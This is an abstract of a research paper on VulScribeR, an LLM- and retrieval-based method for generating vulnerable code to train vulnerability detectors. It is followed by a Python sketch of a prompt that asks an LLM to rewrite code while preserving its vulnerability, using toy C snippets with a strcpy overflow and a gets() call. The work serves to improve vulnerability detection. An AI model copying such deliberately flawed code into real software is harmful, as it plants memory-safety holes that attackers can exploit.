Detecting vulnerabilities is vital for software security, yet deep learning-based vulnerability detectors (DLVD) face a data shortage, which limits their effectiveness. Data augmentation can potentially alleviate this shortage, but augmenting vulnerable code is challenging and requires a generative solution that preserves the vulnerability. Previous works have only focused on generating samples that contain single statements or specific types of vulnerabilities. Recently, large language models (LLMs) have been used to solve various code generation and comprehension tasks with promising results, especially when fused with retrieval-augmented generation (RAG). Therefore, we propose VulScribeR, a novel LLM-based solution that leverages carefully curated prompt templates to augment vulnerable datasets. More specifically, we explore three strategies to augment both single- and multi-statement vulnerabilities with LLMs, namely Mutation, Injection, and Extension. Our extensive evaluation across three vulnerability datasets and DLVD models, using two LLMs, shows that our approach beats two SOTA methods, Vulgen and VGX, and Random Oversampling (ROS) by 27.48%, 27.93%, and 15.41% in F1-score with 5K generated vulnerable samples on average, and by 53.84%, 54.10%, 69.90%, and 40.93% with 15K generated vulnerable samples. Our approach demonstrates its feasibility for large-scale data augmentation by generating 1K samples for as little as US$1.88.
Updated: 2024-12-05 00:00:18
Categories: cs.SE,cs.CR,cs.LG,D.2.7; I.2.2; D.2.5; I.2.5; I.2.6; C.4; I.5.1
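A rough sketch of how a Mutation-style RAG prompt might be assembled: retrieved vulnerable snippets ground the LLM while it rewrites a seed sample. The template wording is illustrative only; the paper's curated prompt templates are not reproduced here.

```python
def build_mutation_prompt(vulnerable_example: str,
                          retrieved_similar: list[str]) -> str:
    """Assemble a RAG-style prompt for a 'Mutation' augmentation pass.

    retrieved_similar: vulnerable snippets fetched by a retriever (e.g.,
    by embedding similarity) to ground the generation; the retriever
    itself is out of scope for this sketch.
    """
    context = "\n---\n".join(retrieved_similar)
    return (
        "You are given examples of vulnerable code:\n"
        f"{context}\n---\n"
        "Rewrite the following vulnerable function with different variable "
        "names and equivalent control flow, PRESERVING the vulnerability:\n"
        f"{vulnerable_example}\n"
    )

print(build_mutation_prompt("int f(char *s) { char b[8]; strcpy(b, s); }",
                            ["void g() { gets(buf); }"]))
```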